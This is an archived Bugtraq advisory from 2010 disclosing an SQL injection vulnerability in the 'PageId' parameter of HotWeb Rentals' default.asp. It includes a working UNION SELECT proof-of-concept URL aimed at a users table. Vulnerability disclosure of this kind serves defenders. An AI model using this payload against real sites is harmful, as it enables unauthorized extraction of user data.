Home page logo
/

bugtraq logo Bugtraq mailing list archives

HotWeb Rentals "PageId" SQL Injection Vulnerability
From: "non customers" <non-customers () operamail com>
Date: Tue, 28 Dec 2010 00:57:13 +0100

HotWeb Rentals "PageId" SQL Injection Vulnerability

PRODUCT >>> http://www.hotwebscripts.co.uk/

Input passed to the "PageId" parameter in default.asp is not properly sanitised before being used in
SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

POC >>> default.asp?PageId=-15+union+select+11,22,33,44,55,66,77,88,99+from+users

-- 
non-customers crew | http://rock-madrid.com/




-- 
_______________________________________________
Surf the Web in a faster, safer and easier way:
Download Opera 9 at http://www.opera.com


  By Date           By Thread  

Current thread:
  • HotWeb Rentals "PageId" SQL Injection Vulnerability non customers (Dec 29)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault